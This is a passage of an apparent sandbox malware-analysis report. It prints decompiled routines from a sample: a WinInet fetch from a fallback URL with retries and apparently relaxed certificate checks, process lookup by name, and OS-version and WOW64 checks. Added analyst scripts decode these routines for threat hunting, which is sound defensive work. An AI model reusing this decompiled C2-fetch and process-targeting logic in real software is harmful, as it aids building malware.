                                                                                                        					_t46 = E014628F0(_t84, E01465000,  &_v3276);
                                                                                                        					_t88 = _t87 + 0xc;
                                                                                                        					_push(_t84);
                                                                                                        					if(_t46 >= 0) {
                                                                                                        						E01461510();
                                                                                                        						_t85 = _a12;
                                                                                                        						_t89 = _t88 + 4;
                                                                                                        						__eflags = _v2052;
                                                                                                        						if(_v2052 != 0) {
                                                                                                        							E014617E0(_t85 + 0x4c8,  &_v2052);
                                                                                                        							_t89 = _t89 + 8;
                                                                                                        						}
                                                                                                        						__eflags = _v3276;
                                                                                                        						if(_v3276 != 0) {
                                                                                                        							E014617E0(_t85,  &_v3276);
                                                                                                        							_t89 = _t89 + 8;
                                                                                                        						}
                                                                                                        						__eflags = _v3148;
                                                                                                        						if(_v3148 != 0) {
                                                                                                        							E014617E0(_t85 + 0x80,  &_v3148);
                                                                                                        							_t89 = _t89 + 8;
                                                                                                        						}
                                                                                                        						__eflags = _v3080;
                                                                                                        						if(_v3080 != 0) {
                                                                                                        							_t82 = _t85 + 0xc4;
                                                                                                        							E014617E0(_t85 + 0xc4,  &_v3080);
                                                                                                        							_t89 = _t89 + 8;
                                                                                                        							__eflags = _v1784;
                                                                                                        							if(_v1784 != 0) {
                                                                                                        								__eflags =  *0x1631c28;
                                                                                                        								if( *0x1631c28 != 0) {
                                                                                                        									_t62 = E01461740("d572da9202196121d952231f26d65d07",  &_v1784);
                                                                                                        									_t89 = _t89 + 8;
                                                                                                        									__eflags = _t62;
                                                                                                        									if(_t62 != 0) {
                                                                                                        										E014676A0(_t79, _t80, _t82, _a16, _a20,  &_v1784);
                                                                                                        										_t89 = _t89 + 0x10;
                                                                                                        									}
                                                                                                        								}
                                                                                                        							}
                                                                                                        						}
                                                                                                        						__eflags = _v2568;
                                                                                                        						if(_v2568 != 0) {
                                                                                                        							E014617E0(_t85 + 0x2c4,  &_v2568);
                                                                                                        							_t89 = _t89 + 8;
                                                                                                        						}
                                                                                                        						 *((intOrPtr*)(_t85 + 0xc0)) = _v3084;
                                                                                                        						 *((intOrPtr*)(_t85 + 0x4c4)) = _v2056;
                                                                                                        						 *((intOrPtr*)(_t85 + 0x5c8)) = _v1796;
                                                                                                        						 *((intOrPtr*)(_t85 + 0x5d0)) = _v1788;
                                                                                                        						_t52 = _v1792;
                                                                                                        						 *((intOrPtr*)(_t85 + 0x5cc)) = _t52;
                                                                                                        						__eflags = _t52;
                                                                                                        						if(_t52 != 0) {
                                                                                                        							E014617E0(_t85 + 0x4c8, "d06ed635-68f6-4e9a-955c-4899f5f57b9a"); // string helper E014617E0 (not shown) stores the GUID-looking constant in the object at +0x4c8
                                                                                                        						}
                                                                                                        						return 1; // success: response was obtained and recorded
                                                                                                        					} else {
                                                                                                        						E01461510();
                                                                                                        						goto L7; // failure path, returns 0
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					Sleep(0x2710); // 10 000 ms before retrying the fetch
                                                                                                        					_t84 = E01464B00(_t79, _t80, _t94, _t81); // E01464B00 is the WinInet GET helper (see APIs below); non-zero means data was read
                                                                                                        					_t87 = _t87 + 4;
                                                                                                        					if(_t84 != 0) {
                                                                                                        						goto L5;
                                                                                                        					} else {
                                                                                                        						_t76 = E014617B0("FALSE", "FALSE"); // string helper on two identical literals; its result gates whether the fallback URL is tried
                                                                                                        						_t92 = _t87 + 8;
                                                                                                        						_t96 = _t76;
                                                                                                        						if(_t76 == 0) {
                                                                                                        							L7:
                                                                                                        							return 0; // both attempts failed
                                                                                                        						} else {
                                                                                                        							_t83 = _a8; // second (fallback) URL argument
                                                                                                        							_t84 = E01464B00(_t79, _t80, _t96, _a8); // first attempt against the fallback
                                                                                                        							_t87 = _t92 + 4;
                                                                                                        							_t97 = _t84;
                                                                                                        							if(_t84 != 0) {
                                                                                                        								goto L5;
                                                                                                        							} else {
                                                                                                        								Sleep(0x2710); // another 10 s, then one last try against the fallback
                                                                                                        								_t84 = E01464B00(_t79, _t80, _t97, _t83);
                                                                                                        								_t87 = _t87 + 4;
                                                                                                        								if(_t84 == 0) {
                                                                                                        									goto L7;
                                                                                                        								} else {
                                                                                                        									goto L5;
                                                                                                        								}
                                                                                                        							}
                                                                                                        						}
                                                                                                        					}
                                                                                                        				}
                                                                                                        			}

                                                                                                        Instruction addresses for the listing above (one per C line; the side column was flattened in extraction): 0x01464de0 to 0x01464ff5, with 0x00000000 marking lines that have no corresponding instruction.


                                                                                                        APIs
                                                                                                          • Part of subcall function 01464B00: InternetCrackUrlA.WININET(7519EA30,00000000,?,?,00000000,00000000), ref: 01464B57
                                                                                                        • Sleep.KERNEL32(00002710,?,?,7519EA30,00000000), ref: 01464E36
                                                                                                          • Part of subcall function 01464B00: InternetOpenA.WININET(WinInetGet/0.1,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 01464B9D
                                                                                                          • Part of subcall function 01464B00: InternetConnectA.WININET(00000000,00000000,?,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 01464BCB
                                                                                                          • Part of subcall function 01464B00: InternetCloseHandle.WININET(00000000,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 01464BE5
                                                                                                        • Sleep.KERNEL32(00002710,?,?,?,?,?,?,7519EA30,00000000), ref: 01464E78
                                                                                                          • Part of subcall function 01464B00: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,0146A200,846CF300,00000000), ref: 01464C52
                                                                                                          • Part of subcall function 01464B00: InternetQueryOptionA.WININET(00000000,0000001F,7519EA30,00000000), ref: 01464C8C
                                                                                                          • Part of subcall function 01464B00: InternetSetOptionA.WININET(00000000,0000001F,00000180,00000004), ref: 01464CAA
                                                                                                          • Part of subcall function 01464B00: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 01464CC1
                                                                                                          • Part of subcall function 01464B00: InternetReadFile.WININET(00000CC8,00000000,00000400,00000000), ref: 01464CF3
                                                                                                          • Part of subcall function 01464B00: InternetCloseHandle.WININET(00000CC8,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01464D9A
                                                                                                          • Part of subcall function 01464B00: InternetCloseHandle.WININET(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01464D9F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Internet$CloseHandle$HttpOpenOptionRequestSleep$ConnectCrackFileQueryReadSend
                                                                                                        • String ID: FALSE$FALSE$d06ed635-68f6-4e9a-955c-4899f5f57b9a$d572da9202196121d952231f26d65d07
                                                                                                        • API String ID: 581717041-1944389977
                                                                                                        • Opcode ID: 933aa0810d28d3fab18e1f189c1724a34e0b4adfb3df17dff6c8a16a5257185c
                                                                                                        • Instruction ID: 5b30da07f50ea53e1e8088d8ede94a1cbcf5b7f59b997aa9d5af02169f5028dd
                                                                                                        • Opcode Fuzzy Hash: 933aa0810d28d3fab18e1f189c1724a34e0b4adfb3df17dff6c8a16a5257185c
                                                                                                        • Instruction Fuzzy Hash: 7251D5B1C002155BEF21DB68EC44FDBB7ECAB54619F0801ABD90CD3250EB34AA94CB93
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%
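The "APIs" list above is printed grouped by the caller's Sleep calls, so the order of the WinInet calls inside subcall 01464B00 is not obvious from it, and the INTERNET_OPTION it sets is shown only as a number. The following helper is an added triage script for this report, not code from the sample or from Joe Sandbox: it parses the bullet lines verbatim from the record above, recovers the subcall's address order, totals the Sleep delays, extracts the hardcoded User-Agent, and decodes option 0x1F. Two caveats are encoded as comments: address order is not execution order where error handling is laid out inline (the InternetCloseHandle at 01464BE5 sits before HttpOpenRequestA because it is the connect-failure cleanup), and treating the 00000180 in the lpBuffer column as the flag value rather than a pointer is an assumption.

```python
"""Recover the WinInet call order of subcall 01464B00 from the report's API
list and decode the option it sets. Added helper, not part of the report."""
import re

# Constructed input: the "APIs" bullets for the routine starting at 0x01464de0,
# copied as printed in the report.
API_LINES = """\
• Part of subcall function 01464B00: InternetCrackUrlA.WININET(7519EA30,00000000,?,?,00000000,00000000), ref: 01464B57
• Sleep.KERNEL32(00002710,?,?,7519EA30,00000000), ref: 01464E36
• Part of subcall function 01464B00: InternetOpenA.WININET(WinInetGet/0.1,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 01464B9D
• Part of subcall function 01464B00: InternetConnectA.WININET(00000000,00000000,?,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 01464BCB
• Part of subcall function 01464B00: InternetCloseHandle.WININET(00000000,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 01464BE5
• Sleep.KERNEL32(00002710,?,?,?,?,?,?,7519EA30,00000000), ref: 01464E78
• Part of subcall function 01464B00: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,0146A200,846CF300,00000000), ref: 01464C52
• Part of subcall function 01464B00: InternetQueryOptionA.WININET(00000000,0000001F,7519EA30,00000000), ref: 01464C8C
• Part of subcall function 01464B00: InternetSetOptionA.WININET(00000000,0000001F,00000180,00000004), ref: 01464CAA
• Part of subcall function 01464B00: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 01464CC1
• Part of subcall function 01464B00: InternetReadFile.WININET(00000CC8,00000000,00000400,00000000), ref: 01464CF3
• Part of subcall function 01464B00: InternetCloseHandle.WININET(00000CC8,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01464D9A
• Part of subcall function 01464B00: InternetCloseHandle.WININET(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01464D9F
"""

LINE_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)

INTERNET_OPTION_SECURITY_FLAGS = 0x1F   # wininet.h value 31
SECURITY_FLAGS = {                      # wininet.h SECURITY_FLAG_IGNORE_* bits
    0x00000080: "SECURITY_FLAG_IGNORE_REVOCATION",
    0x00000100: "SECURITY_FLAG_IGNORE_UNKNOWN_CA",
    0x00000200: "SECURITY_FLAG_IGNORE_WRONG_USAGE",
    0x00001000: "SECURITY_FLAG_IGNORE_CERT_CN_INVALID",
    0x00002000: "SECURITY_FLAG_IGNORE_CERT_DATE_INVALID",
}


def parse_api_lines(text):
    """Turn the report's bullet lines into dicts; lines that do not match are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        entries.append({"subcall": m["sub"], "api": m["api"], "module": m["mod"],
                        "args": m["args"].split(","), "ref": int(m["ref"], 16)})
    return entries


def call_order(entries, subcall):
    """APIs of one subcall sorted by code address. This is layout order, not
    execution order: inline error cleanup (a CloseHandle) can precede later calls."""
    return [e["api"] for e in sorted(entries, key=lambda e: e["ref"]) if e["subcall"] == subcall]


def total_sleep_seconds(entries):
    """Sum of Sleep() first arguments (hex milliseconds) in the caller."""
    return sum(int(e["args"][0], 16) for e in entries if e["api"] == "Sleep") / 1000.0


def user_agent(entries):
    """lpszAgent of InternetOpenA; a hardcoded UA string is a network IOC."""
    return next((e["args"][0] for e in entries if e["api"] == "InternetOpenA"), None)


def decode_security_flags(value):
    """Name the SECURITY_FLAG_IGNORE_* bits in value, keeping any unknown bits visible."""
    names = [n for bit, n in sorted(SECURITY_FLAGS.items()) if value & bit]
    leftover = value & ~sum(SECURITY_FLAGS)
    if leftover:
        names.append(f"UNKNOWN_0x{leftover:X}")
    return names


def set_option_summary(entries):
    """Which INTERNET_OPTION the request sets, decoded when it is the security flags."""
    for e in entries:
        if e["api"] != "InternetSetOptionA":
            continue
        option = int(e["args"][1], 16)
        out = {"option": option, "option_name": None, "flags": []}
        if option == INTERNET_OPTION_SECURITY_FLAGS:
            out["option_name"] = "INTERNET_OPTION_SECURITY_FLAGS"
            # ASSUMPTION: the third column (00000180) is the flag value itself.
            # The sandbox normally prints lpBuffer as a pointer, and 0x180 is not
            # a plausible pointer, so it is decoded as the value here; confirm
            # against the disassembly before relying on this.
            out["flags"] = decode_security_flags(int(e["args"][2], 16))
        return out
    return None


if __name__ == "__main__":
    ents = parse_api_lines(API_LINES)
    print(" -> ".join(call_order(ents, "01464B00")))
    print("sleep total:", total_sleep_seconds(ents), "s; UA:", user_agent(ents))
    print(set_option_summary(ents))
```

If the decoded flags hold up, the request disables revocation checking and accepts an unknown CA, which means a TLS-inspecting proxy or a self-signed C2 certificate would not stop the fetch; the fixed User-Agent and the two 10-second Sleep intervals are the network-side artefacts to hunt for.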

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E01467EF0(intOrPtr _a4) { // _a4: process image name to look for; returns its PID or 0
                                                                                                        				char _v264;           // PROCESSENTRY32.szExeFile (offset 0x24 into the structure)
                                                                                                        				intOrPtr _v292;       // PROCESSENTRY32.th32ProcessID (offset 0x08)
                                                                                                        				void* _v300;          // PROCESSENTRY32.dwSize, i.e. the start of the structure
                                                                                                        				void* _t13;
                                                                                                        				void* _t21;
                                                                                                        				void* _t29;
                                                                                                        				void* _t30;
                                                                                                        				void* _t31;
                                                                                                        
                                                                                                        				_v300 = 0x128;        // sizeof(PROCESSENTRY32) on x86 = 296
                                                                                                        				_t29 = CreateToolhelp32Snapshot(2, 0); // TH32CS_SNAPPROCESS
                                                                                                        				if(_t29 != 0xffffffff) { // INVALID_HANDLE_VALUE
                                                                                                        					Process32First(_t29,  &_v300); // return value not checked
                                                                                                        					_t26 = _a4;
                                                                                                        					_t13 = E01461740(_a4,  &_v264); // name compare helper (not shown); zero is the match path
                                                                                                        					_t31 = _t30 + 8;
                                                                                                        					if(_t13 == 0) {
                                                                                                        						L7:           // match: hand back this entry's PID
                                                                                                        						CloseHandle(_t29);
                                                                                                        						return _v292;
                                                                                                        					} else {
                                                                                                        						if(Process32Next(_t29,  &_v300) == 0) {
                                                                                                        							L6:       // end of the list without a match
                                                                                                        							CloseHandle(_t29);
                                                                                                        							return 0;
                                                                                                        						} else {
                                                                                                        							while(1) { // compare every remaining entry's szExeFile
                                                                                                        								_t21 = E01461740(_t26,  &_v264);
                                                                                                        								_t31 = _t31 + 8;
                                                                                                        								if(_t21 == 0) {
                                                                                                        									goto L7;
                                                                                                        								}
                                                                                                        								if(Process32Next(_t29,  &_v300) != 0) {
                                                                                                        									continue;
                                                                                                        								} else {
                                                                                                        									goto L6;
                                                                                                        								}
                                                                                                        								goto L8; // unreachable; left behind by the decompiler
                                                                                                        							}
                                                                                                        							goto L7;
                                                                                                        						}
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					return 0;     // snapshot could not be taken
                                                                                                        				}
                                                                                                        				L8:
                                                                                                        			}
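Reading E01467EF0 depends on mapping the decompiler's stack slots onto PROCESSENTRY32: _v300 receives 0x128 and is passed to Process32First, _v264 is what the name helper compares, and _v292 is what the function returns. The script below is an added check for this report, not code from the sample or from Joe Sandbox. It models the 32-bit PROCESSENTRY32 layout explicitly with ctypes (the sample is a 32-bit executable, and ULONG_PTR is 4 bytes there, so it runs on any host) and resolves the slot names to fields; the slot arithmetic and the helper names are mine.

```python
"""Resolve Joe Sandbox stack slots in E01467EF0 to PROCESSENTRY32 fields.
Added analysis helper, not part of the report or the sample."""
import ctypes

MAX_PATH = 260


class PROCESSENTRY32_X86(ctypes.Structure):
    """PROCESSENTRY32 with explicit x86 widths (ULONG_PTR modelled as 4 bytes),
    so the layout is the 32-bit one regardless of the host Python."""
    _pack_ = 4
    _fields_ = [
        ("dwSize", ctypes.c_uint32),
        ("cntUsage", ctypes.c_uint32),
        ("th32ProcessID", ctypes.c_uint32),
        ("th32DefaultHeapID", ctypes.c_uint32),   # ULONG_PTR on x86
        ("th32ModuleID", ctypes.c_uint32),
        ("cntThreads", ctypes.c_uint32),
        ("th32ParentProcessID", ctypes.c_uint32),
        ("pcPriClassBase", ctypes.c_int32),       # LONG
        ("dwFlags", ctypes.c_uint32),
        ("szExeFile", ctypes.c_char * MAX_PATH),
    ]


def field_offsets(struct=PROCESSENTRY32_X86):
    """{field_name: byte_offset} for the structure."""
    return {name: getattr(struct, name).offset for name, _ in struct._fields_}


def resolve_stack_slot(slot, base_slot="_v300", struct=PROCESSENTRY32_X86):
    """Translate a decompiler slot such as '_v264' to (field, offset_in_field).

    base_slot is the slot holding dwSize, i.e. the structure start (the one
    assigned 0x128 in the listing). Slot numbers are negative frame offsets,
    so _v300 -> _v264 is +36 bytes into the structure.
    """
    base = int(base_slot.lstrip("_v"))
    off = base - int(slot.lstrip("_v"))
    for name, field_off in field_offsets(struct).items():
        size = getattr(struct, name).size
        if field_off <= off < field_off + size:
            return name, off - field_off
    raise ValueError(f"{slot} lies outside the structure")


def check_listing():
    """Check the constants in the listing against the modelled layout."""
    return {
        "dwSize_matches_0x128": ctypes.sizeof(PROCESSENTRY32_X86) == 0x128,
        "_v300": resolve_stack_slot("_v300")[0],   # what receives 0x128
        "_v292": resolve_stack_slot("_v292")[0],   # what the function returns
        "_v264": resolve_stack_slot("_v264")[0],   # what E01461740 compares
    }


if __name__ == "__main__":
    for key, value in check_listing().items():
        print(f"{key}: {value}")
```

With the offsets confirmed, the routine reads as "walk every process, compare szExeFile against the caller's string, return the first matching th32ProcessID", which is the usual precursor both to picking an injection target and to checking for analysis tools by name.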

                                                                                                        Instruction addresses for the listing above (one per C line; the side column was flattened in extraction): 0x01467efe to 0x01467f97, with 0x00000000 marking lines that have no corresponding instruction.


                                                                                                        APIs
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?), ref: 01467F08
                                                                                                        • Process32First.KERNEL32(00000000,00000128,00000001,00000002,00000000,?), ref: 01467F24
                                                                                                        • Process32Next.KERNEL32(00000000,00000128,00000000,?), ref: 01467F48
                                                                                                        • Process32Next.KERNEL32(00000000,00000128,00000000,00000128,00000000,?), ref: 01467F6D
                                                                                                        • CloseHandle.KERNEL32(00000000,00000000,00000128,00000000,?), ref: 01467F77
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                                                                                                        • String ID:
                                                                                                        • API String ID: 2284531361-0
                                                                                                        • Opcode ID: a127acf32eba3c8e6e2ef316381a82c72e97d74d5dd9353b0e677753e51a5c0b
                                                                                                        • Instruction ID: d5862b2b8a57088ee57b5843bdad6965847d11aad63791e05f1a9dafb2de3b72
                                                                                                        • Opcode Fuzzy Hash: a127acf32eba3c8e6e2ef316381a82c72e97d74d5dd9353b0e677753e51a5c0b
                                                                                                        • Instruction Fuzzy Hash: 2D110C315011296BEB20A629AC40EFF73ACDF7926EF0001A7ED08D2150EB34DA5646B7
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 58%
                                                                                                        			E01468CE0() {
                                                                                                        				_Unknown_base(*)()* _t2;
                                                                                                        				signed int _t3;
                                                                                                        				signed int _t5;
                                                                                                        				void* _t9;
                                                                                                        
                                                                                                        				 *0x1632e0c = 0x11c; // global RTL_OSVERSIONINFOEXW: dwOSVersionInfoSize = 0x11c (284) = sizeof(OSVERSIONINFOEXW)
                                                                                                        				_t2 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlGetVersion"); // resolved at runtime; RtlGetVersion reports the true version, unlike GetVersionEx, which is shimmed on 8.1+ for unmanifested binaries
                                                                                                        				if(_t2 != 0) {
                                                                                                        					 *_t2(0x1632e0c); // RtlGetVersion(&osvi)
                                                                                                        				}
                                                                                                        				_t3 =  *0x1632e10; // dwMajorVersion
                                                                                                        				if(_t3 == 0) {
                                                                                                        					L22:
                                                                                                        					return _t3; // RtlGetVersion missing or failed: the tier slot at 0x1632e08 is left untouched
                                                                                                        				} else {
                                                                                                        					_t5 = _t3 << 0x00000008 |  *0x1632e14; // key = (dwMajorVersion << 8) | dwMinorVersion, e.g. 0x601 = 6.1
                                                                                                        					_t9 = _t5 - 0x602;
                                                                                                        					if(_t9 > 0) { // newer than 6.2
                                                                                                        						if(_t5 == 0x603) {
                                                                                                        							 *0x1632e08 = 4; // 6.3: Windows 8.1 / Server 2012 R2
                                                                                                        							return _t5;
                                                                                                        						}
                                                                                                        						if(_t5 == 0xa00) { // 10.0: tier by dwBuildNumber
                                                                                                        							_t3 =  *0x1632e18; // dwBuildNumber
                                                                                                        							if(_t3 < 0x3fab) { // 16299 (1709)
                                                                                                        								if(_t3 < 0x3ad7) { // 15063 (1703)
                                                                                                        									if(_t3 < 0x3839) { // 14393 (1607)
                                                                                                        										if(_t3 < 0x295a) { // 10586 (1511)
                                                                                                        											goto L22; // RTM build 10240: no tier assigned
                                                                                                        										} else {
                                                                                                        											 *0x1632e08 = 5; // 10.0 1511
                                                                                                        											return _t3;
                                                                                                        										}
                                                                                                        									} else {
                                                                                                        										 *0x1632e08 = 6; // 10.0 1607
                                                                                                        										return _t3;
                                                                                                        									}
                                                                                                        								} else {
                                                                                                        									 *0x1632e08 = 7; // 10.0 1703
                                                                                                        									return _t3;
                                                                                                        								}
                                                                                                        							} else {
                                                                                                        								 *0x1632e08 = 8; // 10.0 1709 and later
                                                                                                        								return _t3;
                                                                                                        							}
                                                                                                        						} else {
                                                                                                        							goto L12; // anything else above 6.2 (e.g. 6.4) is "other"
                                                                                                        						}
                                                                                                        					} else {
                                                                                                        						if(_t9 == 0) {
                                                                                                        							 *0x1632e08 = 3; // 6.2: Windows 8 / Server 2012
                                                                                                        							return _t5;
                                                                                                        						} else {
                                                                                                        							if(_t5 == 0x501) {
                                                                                                        								 *0x1632e08 = 1; // 5.1: Windows XP
                                                                                                        								return _t5;
                                                                                                        							} else {
                                                                                                        								if(_t5 != 0x601) {
                                                                                                        									L12:
                                                                                                        									 *0x1632e08 = 0; // unrecognized, including 5.2 (XP x64 / Server 2003) and 6.0 (Vista / Server 2008)
                                                                                                        									return _t5;
                                                                                                        								} else {
                                                                                                        									 *0x1632e08 = 2; // 6.1: Windows 7 / Server 2008 R2
                                                                                                        									return _t5;
                                                                                                        								}
                                                                                                        							}
                                                                                                        						}
                                                                                                        					}
                                                                                                        				}
                                                                                                        			}







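The decision tree recovered in E01468CE0, rewritten as a readable C function with the magic numbers decoded. This is an added editor's example, not code recovered from the sample: the names win_tier, win_tier_name, WT_* and BUILD_* are the editor's. It goes slightly beyond the listing by naming the Windows release each build threshold corresponds to (10586 = 1511, 14393 = 1607, 15063 = 1703, 16299 = 1709) and by returning an explicit -1 where the sample simply leaves its tier slot at 0x1632e08 untouched.

```c
#include <stdint.h>
#include <stdio.h>

/* Tier codes exactly as E01468CE0 stores them at 0x1632e08 (editor's names). */
enum win_tier_code {
    WT_UNSET   = -1, /* slot left untouched: RtlGetVersion missing/failed, or 10.0 below build 10586 */
    WT_OTHER   =  0, /* unmatched, including 5.2 (XP x64 / Server 2003) and 6.0 (Vista / Server 2008) */
    WT_XP      =  1, /* 5.1 */
    WT_WIN7    =  2, /* 6.1 */
    WT_WIN8    =  3, /* 6.2 */
    WT_WIN81   =  4, /* 6.3 */
    WT_10_1511 =  5, /* 10.0, build 10586 .. 14392 */
    WT_10_1607 =  6, /* 10.0, build 14393 .. 15062 */
    WT_10_1703 =  7, /* 10.0, build 15063 .. 16298 */
    WT_10_1709 =  8  /* 10.0, build 16299 and later */
};

/* dwBuildNumber thresholds from the listing, decoded. */
#define BUILD_1511 0x295au /* 10586 */
#define BUILD_1607 0x3839u /* 14393 */
#define BUILD_1703 0x3ad7u /* 15063 */
#define BUILD_1709 0x3fabu /* 16299 */

/* The sample folds major/minor into one key: (major << 8) | minor, so 0x601 is 6.1. */
static uint32_t pack_version(uint32_t major, uint32_t minor)
{
    return (major << 8) | minor;
}

/* Same branches, in the same order, as the decompiled function. */
int win_tier(uint32_t major, uint32_t minor, uint32_t build)
{
    if (major == 0)
        return WT_UNSET;                    /* the "_t3 == 0 -> L22" early return */

    uint32_t key = pack_version(major, minor);

    if (key > 0x602) {                      /* "_t5 - 0x602 > 0" */
        if (key == 0x603)
            return WT_WIN81;
        if (key != 0xa00)
            return WT_OTHER;                /* "goto L12" */
        if (build >= BUILD_1709) return WT_10_1709;
        if (build >= BUILD_1703) return WT_10_1703;
        if (build >= BUILD_1607) return WT_10_1607;
        if (build >= BUILD_1511) return WT_10_1511;
        return WT_UNSET;                    /* RTM build 10240 falls out via L22 */
    }
    if (key == 0x602) return WT_WIN8;       /* "_t9 == 0" */
    if (key == 0x501) return WT_XP;
    if (key == 0x601) return WT_WIN7;
    return WT_OTHER;                        /* L12: 5.0, 5.2, 6.0, ... */
}

const char *win_tier_name(int tier)
{
    switch (tier) {
    case WT_UNSET:   return "untouched";
    case WT_OTHER:   return "other";
    case WT_XP:      return "Windows XP";
    case WT_WIN7:    return "Windows 7";
    case WT_WIN8:    return "Windows 8";
    case WT_WIN81:   return "Windows 8.1";
    case WT_10_1511: return "Windows 10 1511+";
    case WT_10_1607: return "Windows 10 1607+";
    case WT_10_1703: return "Windows 10 1703+";
    case WT_10_1709: return "Windows 10 1709+";
    default:         return "?";
    }
}

int main(void)
{
    /* Constructed host versions (major, minor, build); not data taken from the report. */
    const uint32_t hosts[][3] = {
        {5, 1, 2600}, {5, 2, 3790}, {6, 0, 6002}, {6, 1, 7601}, {6, 2, 9200},
        {6, 3, 9600}, {10, 0, 10240}, {10, 0, 10586}, {10, 0, 14393},
        {10, 0, 15063}, {10, 0, 16299}, {10, 0, 17134}, {0, 0, 0},
    };
    for (size_t i = 0; i < sizeof hosts / sizeof hosts[0]; i++) {
        int t = win_tier(hosts[i][0], hosts[i][1], hosts[i][2]);
        printf("%2u.%u build %5u -> tier %2d (%s)\n",
               (unsigned)hosts[i][0], (unsigned)hosts[i][1], (unsigned)hosts[i][2],
               t, win_tier_name(t));
    }
    return 0;
}
```

Two details worth checking against the listing: 5.2 and 6.0 land in tier 0 like any unrecognized version, and Windows 10 RTM (build 10240) sets no tier at all, so the later code that reads 0x1632e08 sees whatever the slot held before.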

                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlGetVersion,01468DD5,01463448), ref: 01468CF4
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 01468CFB
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                        • String ID: RtlGetVersion$ntdll.dll
                                                                                                        • API String ID: 1646373207-1489217083
                                                                                                        • Opcode ID: 2cbd2abf0a7c773a7e44e09ae2f49d5c0cd3253c1f2d5d10204db01e652f34a0
                                                                                                        • Instruction ID: 4fe17b75e3aefe3b9d4070e83c5f787ba08c08441ff64074e7ea22fc02295324
                                                                                                        • Opcode Fuzzy Hash: 2cbd2abf0a7c773a7e44e09ae2f49d5c0cd3253c1f2d5d10204db01e652f34a0
                                                                                                        • Instruction Fuzzy Hash: 1A11EFB51407019AF735CF15ECAA71A3B99A360709FE8985ED100D62B4CBFC81A6CB76
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 58%
                                                                                                        			E01468270(void* __ecx, intOrPtr _a4) {
                                                                                                        				char _v8;
                                                                                                        				_Unknown_base(*)()* _t6;
                                                                                                        				void* _t8;
                                                                                                        
                                                                                                        				_v8 = 0; // BOOL Wow64Process, defaults to FALSE
                                                                                                        				_t6 = GetProcAddress(GetModuleHandleW(L"kernel32"), "IsWow64Process"); // resolved at runtime: the export is absent before XP SP2, so a static import would keep the binary from loading there
                                                                                                        				if(_t6 == 0) {
                                                                                                        					L3:
                                                                                                        					return _v8;
                                                                                                        				} else {
                                                                                                        					_t8 =  *_t6(_a4,  &_v8); // IsWow64Process(hProcess = _a4, &Wow64Process)
                                                                                                        					if(_t8 != 0) {
                                                                                                        						goto L3; // call succeeded: return the WOW64 flag
                                                                                                        					} else {
                                                                                                        						return _t8; // call failed: return 0
                                                                                                        					}
                                                                                                        				}
                                                                                                        			}







                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,01463432), ref: 01468285
                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,01463432), ref: 0146828C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                        • String ID: IsWow64Process$kernel32
                                                                                                        • API String ID: 1646373207-3789238822
                                                                                                        • Opcode ID: 6062dc9b10411a7b4b174f03fb3b4933761f5b161bcb52c12432041cb1776fdd
                                                                                                        • Instruction ID: f7e02938b62883c079bed59e491bc9c2c694de44fe7eeba39a8df68ec1d057f4
                                                                                                        • Opcode Fuzzy Hash: 6062dc9b10411a7b4b174f03fb3b4933761f5b161bcb52c12432041cb1776fdd
                                                                                                        • Instruction Fuzzy Hash: D1E04F7064470ABFDB10CFD5DC09A6E77BCDF4064DF100199F90893220EAB19A109752
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 87%
